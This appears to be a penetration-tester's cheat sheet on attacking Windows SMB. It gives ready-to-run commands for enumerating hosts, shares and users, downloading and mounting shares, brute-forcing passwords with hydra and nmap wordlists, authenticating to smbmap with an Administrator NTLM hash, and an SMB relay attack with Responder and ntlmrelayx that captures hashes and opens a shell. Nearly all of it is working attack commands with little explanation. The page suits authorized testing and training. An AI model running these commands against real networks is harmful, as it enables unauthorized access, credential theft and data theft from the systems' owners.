SMB

List of SMB versions and corresponding Windows versions:

SMB1 – Windows 2000, XP and Windows 2003.
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.

ENUM4LINUX


enum4linux -a $ip
enum4linux -u user_name -p password $ip #enum with user account
enum4linux -U $ip #list usernames
enum4linux -S #list shares
enum4linux -o remote_host #get Os information

NMAP/SMBCLIENT/SMBMAP


#ENUM OS, computer name, domain, workgroup, and current time over the SMB protocol 
nmap -v -p 139,445 --script smb-os-discovery $ip

#LIST SHARES
nmap --script smb-enum-shares -p 139,445 $ip
smbclient -L \\\\$ip\\
smbclient -L \\$ip --option='client min protocol=NT1' #if NT_STATUS_CONNECTION_DISCONNECTED
smbmap -H $ip

#LIST FILES
smbclient //$ip/PATH -c 'recurse;ls'
net view \\dc01 /all
smbmap -H $ip -R $sharename

#CONNECT TO SHARE
smbclient -U '%' -L //$ip
smbclient -U 'guest%' -L //$ip
smbclient \\\\192.168.1.101\\C$
smbclient \\\\192.168.1.101\\C$ --option='client min protocol=NT1'
smbclient \\\\192.168.1.101\\admin$ -U username

DOWNLOAD FILES

smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
# With smbclient

smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q
# Downloads a file in quiet mode

smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*'
# download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work

MOUNT SHARES LOCALLY

sudo mount -t cifs -o 'user=guest' //$ip/share /mnt/share
sudo mount -t cifs -o 'username=user,password=password' //$ip/sharename /mnt
ls /mnt/share -laR #recurse listing of all dirs

hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb	

nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip  -vvvv

SMB Relay - AD

Relay hash to another machine, that allow to gain access.

Require user’s hash to be admin on the target and smb singing must be disabled on the target.

#1. Check for smb with signing disabled

nmap --script=smb2-security-mode.nse -p445 $net --open

#2. Turn off responder for http and smb, just listen and answer for fake request
#to relay hash to another machine

sudo vim /etc/responder/Responder.conf

#3. Run responder

sudo responder -A -I eth0 -v 

#4. Run ntlmrelayx to take hash from responder and relay it to another machine

impacket-ntlmrelayx -tf targets.txt -smb2support

#5. Get SAM local hashes
#To get smb shell, allowing to put file, change password, use shared etc.
impacket-ntlmrelayx -tf targets.txt -smb2support -i

nc 127.0.0.1 11000

PreviousMYSQL NextMethodology

Last updated 4 months ago

hashtagENUM4LINUX

hashtagNMAP/SMBCLIENT/SMBMAP

hashtagDOWNLOAD FILES

hashtagMOUNT SHARES LOCALLY

hashtagBRUTE FORCE SHARE

hashtagSMB Relay - AD

ENUM4LINUX

NMAP/SMBCLIENT/SMBMAP

DOWNLOAD FILES

MOUNT SHARES LOCALLY

BRUTE FORCE SHARE

SMB Relay - AD